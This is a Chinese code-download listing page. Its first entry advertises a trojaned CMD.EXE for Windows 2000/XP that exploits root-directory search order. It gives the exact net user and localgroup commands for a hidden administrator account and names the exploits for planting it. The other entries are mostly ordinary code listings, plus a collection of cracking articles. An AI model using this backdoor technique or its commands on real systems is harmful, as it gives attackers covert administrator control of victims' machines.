你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
上传时间: 2015-01-12
上传用户:qlpqlq
给出一组数的全排列 如1,2,3给出 123,321,312
上传时间: 2013-12-19
上传用户:jennyzai
PhpDig is a search engine written in PHP that uses a MySQL database backend. It features indexing of both static and dynamic pages, spidering of almost all links in HTML content, in hrefs, areamaps, and frames, and full text indexing. The search results appearence is skin-able, using a very simple templates system. PhpDig是一个用PHP编写的搜索引擎,它使用MySQL数据库后台。它的功能有静态和动态页面索引,在HTML内容中用hrefs, areamaps,和frames以及全文本索引构成所有的链接网。搜索结果的外观是可定制外观的,使用一个非常简单的模板系统。
标签: database features indexing backend
上传时间: 2014-01-03
上传用户:haohaoxuexi
1400多篇各类破解文章全中文
上传时间: 2014-01-08
上传用户:520
全球手机顶尖游戏3D MotoRacer制作全揭密1
上传时间: 2013-12-24
上传用户:yyyyyyyyyy
这是一个非常全面的 C 语言常见问题解答的电子版资料,你可以在本程序中寻找到 TC 中绝大多数问题的答案。
上传时间: 2015-01-15
上传用户:徐孺
一个可以进行全角字符《---》半角字符转化的 C 语言函数。
上传时间: 2013-12-18
上传用户:woshiayin
Java实现串口全双工通讯
上传时间: 2014-12-03
上传用户:亚亚娟娟123
VB九全大补膏,很多源码集合。
标签: 多源
上传时间: 2013-12-23
上传用户:ruixue198909
经典算法之:连续邮资问题,全排列问题,有限期任务安排,整数划分问题,装载问题
上传时间: 2013-12-27
上传用户:hebmuljb
